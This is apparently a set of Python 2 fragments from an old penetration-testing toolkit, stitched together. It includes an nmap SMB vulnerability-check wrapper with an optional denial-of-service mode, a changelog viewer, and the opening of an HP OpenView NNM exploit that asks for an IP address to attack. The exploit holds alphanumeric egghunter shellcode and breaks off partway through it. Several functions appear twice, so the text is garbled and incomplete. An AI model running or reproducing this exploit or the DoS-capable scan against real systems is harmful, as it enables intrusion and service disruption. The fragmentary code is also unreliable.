def get_target(counter, self_banner): """ get user input, check for valid input, and loop back through if invalid input is entered. """ tries = counter target_input = raw_input(""" NOTE: A single host or a network/block can be specified for testing. examples: 192.168.1.21 192.168.1.0/24 Enter the host or range to be checked: """) if counter == 3: print_banner() print self_banner sleep(1) print " Just so you know...I can go on like this all day...." sleep(1) tries = 0 get_target(tries, self_banner) if target_input == "" or len(target_input.split(".")) != 4: print_banner() print self_banner print " *** YOU MUST ENTER A VALID HOST OR RANGE TO CHECK **" tries += 1 get_target(tries, self_banner) else: return (target_input)
def get_target(counter, self_banner): """ get user input, check for valid input, and loop back through if invalid input is entered. """ tries = counter target_input = raw_input( """ NOTE: A single host or a network/block can be specified for testing. examples: 192.168.1.21 192.168.1.0/24 Enter the host or range to be checked: """ ) if counter == 3: print_banner() print self_banner sleep(1) print " Just so you know...I can go on like this all day...." sleep(1) tries = 0 get_target(tries, self_banner) if target_input == "" or len(target_input.split(".")) != 4: print_banner() print self_banner print " *** YOU MUST ENTER A VALID HOST OR RANGE TO CHECK **" tries += 1 get_target(tries, self_banner) else: return target_input
def nmapsmbcheckvulns_run(): """ Main execution logic: reuse common nse modules for this nse script """ self_banner = """ ** Nmap Scripting Engine: Script - smb-check-vulns ** ** ** ** Checks a host or network MS08-067 ** ** for vulnerability to: Conficker infection ** ** regsvc DoS: (When enabled) ** ** SMBv2 DoS: (When enabled) ** ***************************************************************** """ # BEGIN MAIN EXECUTION counter = 0 print_banner() print self_banner print " <ctrl>-c at any time to Cancel" # get the host or network to operate on target = get_target(counter, self_banner) # enable or disable this scripts arguments aggressive = raw_input( """\n Do you want to enable aggressive testing (regsvc, SMBv2 DoS)? WARNING: these checks can cause a Denial of Service! [y|n]: """) # check answer on aggressive mode if aggressive == "y" or aggressive == "yes": command = "nmap --script smb-check-vulns --script-args=unsafe=1 -p445 %s" % target runnse(command) if aggressive == "n" or aggressive == "no": command = "nmap --script smb-check-vulns -p445 %s" % target runnse(command)
def nmapsmbcheckvulns_run(): """ Main execution logic: reuse common nse modules for this nse script """ self_banner = """ ** Nmap Scripting Engine: Script - smb-check-vulns ** ** ** ** Checks a host or network MS08-067 ** ** for vulnerability to: Conficker infection ** ** regsvc DoS: (When enabled) ** ** SMBv2 DoS: (When enabled) ** ***************************************************************** """ # BEGIN MAIN EXECUTION counter = 0 print_banner() print self_banner print " <ctrl>-c at any time to Cancel" # get the host or network to operate on target = get_target(counter,self_banner) # enable or disable this scripts arguments aggressive = raw_input("""\n Do you want to enable aggressive testing (regsvc, SMBv2 DoS)? WARNING: these checks can cause a Denial of Service! [y|n]: """) # check answer on aggressive mode if aggressive == "y" or aggressive == "yes": command = "nmap --script smb-check-vulns --script-args=unsafe=1 -p445 %s" % target runnse(command) if aggressive == "n" or aggressive == "no": command = "nmap --script smb-check-vulns -p445 %s" % target runnse(command)
def runnse(command): print_banner() os.system(command) raw_input("\nPress <enter> to return...\n")
#!/usr/bin/env python import socket import os import sys from time import sleep from bin.include import print_banner # Alphanumeric egghunter shellcode + restricted chars \x40\x3f\x3a\x2f - ph33r # One egg to rule them all. print_banner() try: target = sys.argv[4] except IndexError: print "HP OpenView NNM Exploit:\n" print """ ********************* NOTE ************************* If this exploit is not executed against the intended target chances are it will not succeed. <ctrl>-c to Cancel """ target = raw_input(" Enter the IP Address to Attack: ") egghunter = ("%JMNU%521*TX-1MUU-1KUU-5QUUP\AA%J" "MNU%521*-!UUU-!TUU-IoUmPAA%JMNU%5" "21*-q!au-q!au-oGSePAA%JMNU%521*-D" "A~X-D4~X-H3xTPAA%JMNU%521*-qz1E-1" "z1E-oRHEPAA%JMNU%521*-3s1--331--^" "TC1PAA%JMNU%521*-E1wE-E1GE-tEtFPA"
#!/usr/bin/env python import os import sys from bin.include import print_banner definepath=os.getcwd() openfile=file("%s/readme/CHANGELOG" % (definepath),"r").readlines() print_banner() print '\n' for line in openfile: print line.rstrip() pause=raw_input("\bHit enter to return to main menu.")